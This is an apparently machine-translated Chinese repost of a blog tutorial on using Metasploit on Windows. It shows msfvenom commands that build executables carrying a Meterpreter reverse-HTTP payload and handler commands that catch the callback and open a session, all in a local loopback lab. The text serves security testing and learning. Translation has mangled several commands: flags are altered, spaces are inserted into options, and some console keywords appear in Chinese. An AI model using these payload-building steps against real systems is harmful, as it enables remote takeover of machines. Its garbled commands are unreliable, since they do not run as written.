在Windows上使用Metasploit

在我以前的文章“ 读取64位进程的内存 ”中,我使用了Metasploit的Windows版本,这样我就可以用一台机器完成所有的测试:在同一台机器上运行Meterpreter客户机和服务器。

Metasploit框架需要在Windows上安装管理权限,它将默认安装在c:\ metasploit文件夹中。当您在Windows上安装和使用Metasploit时,Windows机器上的AV会生成警报,因此请确保创建适当的例外。

一般的评论:Windows上的Metaploit比Linux上的要慢,耐心等待。

我使用MSFVenom(c:\ metasploit \ msfvenom.bat)创建32位和64位可执行文件来注入Meterpreter负载。

命令“msfvenom.bat -help”将显示所有选项

命令“msfvenom.bat -list payloads”将显示所有的有效载荷:

命令“msfvenom.bat -help-formats”将显示所有输出格式:

可执行格式将生成程序和脚本,而转换格式将生成有效负载。稍后再说。

我使用msfvenom.bat创建一个带有meterpreter_reverse_http负载的32位和64位可执行文件。

这里是32位的命令:“msfvenom.bat -payload windows / meterpreter_reverse_http -format exe -out meterpreter-32.exe LHOST = 127.0.0.1”。

由于我没有指定平台和体系结构,msfvenom将根据我选择的有效负载来选择这些。

格式exe是.exe文件的可执行格式。

windows / meterpreter_reverse_http是meterpreter_reverse_http负载的Windows 32位版本。这个有效载荷需要几个选项,可以用下面的命令来枚举:

“msfvenom.bat -payload windows / meterpreter_reverse_http -payload-options”

LHOST是唯一没有默认值的必需选项。我使用LHOST = 127.0.0.1,因为我在同一台机器上做了所有的事情,所以可以使用环回地址。

这里是64位的命令:“msfvenom.bat -payload窗口/ x64 / meterpreter_reverse_http -format exe -out meterpreter-64.exe LHOST = 127.0.0.1”。

现在我创建了我的2个可执行文件,我可以启动Metasploit的控制台并使用它们。

我启动c:\ metasploit \ console.bat(这将需要在Windows上几分钟)。

然后用这些命令启动Meterpreter服务器:

使用exploit / multi / handler
设置有效载荷窗口/ meterpreter_reverse_http
设置lhost 127.0.0.1
漏洞利用

Metasploit处理程序正在等待连接。我以管理员身份启动meterpreter-64.exe,因为我希望它具有SYSTEM权限(我以普通用户身份运行msfvenom和控制台)。

启动时,meterpreter-64.exe将连接到处理程序并等待指令(该进程不会退出)。我们可以在这里看到这个连接:

通过会话命令,我们可以看到所有的回调:

在这里,我们选择会话1与Meterpreter进行交互:

从这里开始,我们可以使用这个Meterpreter外壳:


转载请注明出处:https://www.freearoot.com/index.php/%e5%9c%a8windows%e4%b8%8a%e4%bd%bf%e7%94%a8metasploit.html

转载来源:https://blog.didierstevens.com/2017/08/14/using-metasploit-on-windows/